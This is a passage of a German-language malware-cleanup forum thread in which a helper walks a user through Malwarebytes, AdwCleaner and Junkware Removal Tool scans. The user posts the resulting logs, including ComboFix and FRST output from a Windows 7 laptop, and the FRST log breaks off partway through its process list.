"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
wtbchkxbde..vbs [2013-9-22 73266]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032]
VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x]
R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x]
S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x]
S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x]
S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x]
S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-04-02 06:02        1150280        ----a-w-        c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe
.
Inhalt des "geplante Tasks" Ordners
.
2014-04-15 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
2014-04-16 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648]
"Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160]
"BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144]
"wtbchkxbde"="wscript.exe" [2009-07-14 168960]
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.com.ph/intl/en/
uLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 172.20.10.1
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
Toolbar-Locked - (no file)
HKLM-Run-mwlDaemon - c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2014-04-16  03:42:26
ComboFix-quarantined-files.txt  2014-04-16 01:42
.
Vor Suchlauf: 15 Verzeichnis(se), 30.584.696.832 Bytes frei
Nach Suchlauf: 24 Verzeichnis(se), 33.646.391.296 Bytes frei
.
- - End Of File - - 7B368FD47A4B13E2B05BF79FBA8C7373


schrauber 16.04.2014 19:25

Downloade Dir bitte Malwarebytes Anti-Malware
  • Installiere das Programm in den vorgegebenen Pfad. (Bebilderte Anleitung zu MBAM)
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scannen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
  • Wähle das neueste Scan-Protokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.


Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.


und ein frisches FRST log bitte.

fxak 16.04.2014 23:18

Ok, alles erledigt

mbam hat nichts gefunden
mbam.txt:
Code:

Malwarebytes Anti-Malware
www.malwarebytes.org

Suchlauf Datum: 16.04.2014
Suchlauf-Zeit: 23:35:03
Logdatei: mbam.txt
Administrator: Ja

Version: 2.00.1.1004
Malware Datenbank: v2014.04.16.10
Rootkit Datenbank: v2014.03.27.01
Lizenz: Kostenlos
Malware Schutz: Deaktiviert
Bösartiger Webseiten Schutz: Deaktiviert
Chameleon: Deaktiviert

Betriebssystem: Windows 7
CPU: x64
Dateisystem: NTFS
Benutzer: Franz

Suchlauf-Art: Bedrohungs-Suchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 260376
Verstrichene Zeit: 24 Min, 16 Sek

Speicher: Aktiviert
Autostart: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Shuriken: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registrierungsschlüssel: 0
(No malicious items detected)

Registrierungswerte: 0
(No malicious items detected)

Registrierungsdaten: 0
(No malicious items detected)

Ordner: 0
(No malicious items detected)

Dateien: 0
(No malicious items detected)

Physische Sektoren: 0
(No malicious items detected)


(end)

adwcleaner hat nur Einstellungen von Chrome gefunden, habe ich gelöscht
AdwCleaner[S1].txt:
Code:

# AdwCleaner v3.023 - Bericht erstellt am 16/04/2014 um 23:59:49
# Aktualisiert 01/04/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium  (64 bits)
# Benutzername : Franz - FRANZ-PC
# Gestartet von : C:\Users\Franz\Desktop\Antivir\Trojanerboard\adwcleaner.exe
# Option : Löschen

***** [ Dienste ] *****


***** [ Dateien / Ordner ] *****


***** [ Verknüpfungen ] *****


***** [ Registrierungsdatenbank ] *****


***** [ Browser ] *****

-\\ Internet Explorer v9.0.8112.16476


-\\ Google Chrome v33.0.1750.154

[ Datei : C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [1798 octets] - [11/03/2014 17:56:10]
AdwCleaner[R1].txt - [923 octets] - [16/04/2014 23:41:47]
AdwCleaner[S0].txt - [1811 octets] - [11/03/2014 17:57:23]
AdwCleaner[S1].txt - [845 octets] - [16/04/2014 23:59:49]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [904 octets] ##########

Habe den AdwCleaner vor 4 Wochen schon mal laufen lassen, das war aber bevor ich diesen Virus bekommen habe, aber vielleicht ists ja trotzdem intressant
AdwCleaner[S0].txt:
Code:

# AdwCleaner v3.021 - Bericht erstellt am 11/03/2014 um 16:57:23
# Aktualisiert 10/03/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium  (64 bits)
# Benutzername : Franz - FRANZ-PC
# Gestartet von : C:\Downloads\Chrome\adwcleaner_3.021.exe
# Option : Löschen

***** [ Dienste ] *****


***** [ Dateien / Ordner ] *****

Ordner Gelöscht : C:\ProgramData\Partner
Ordner Gelöscht : C:\ProgramData\Tarma Installer
Ordner Gelöscht : C:\Users\Franz\AppData\Local\Temp\boost_interprocess

***** [ Verknüpfungen ] *****


***** [ Registrierungsdatenbank ] *****

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{10DE7085-6A1E-4D41-A7BF-9AF93E351401}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{1AD27395-1659-4DFF-A319-2CFA243861A5}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Schlüssel Gelöscht : HKCU\Software\InstallCore
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Tarma Installer

***** [ Browser ] *****

-\\ Internet Explorer v9.0.8112.16476


-\\ Google Chrome v33.0.1750.146

[ Datei : C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [1798 octets] - [11/03/2014 16:56:10]
AdwCleaner[S0].txt - [1663 octets] - [11/03/2014 16:57:23]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1723 octets] ##########

Junkware Removal Tool:
jrt.txt:
Code:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.4 (04.06.2014:1)
OS: Windows 7 Home Premium x64
Ran by Franz on 16.04.2014 at 23:46:09,11
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}



~~~ Files



~~~ Folders



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 16.04.2014 at 23:53:19,02
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


neues FRST-Log:
FRST.txt:

FRST Logfile:
Code:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 17-04-2014 00:04:41
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal


==================== Processes (Whitelisted) =================

(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
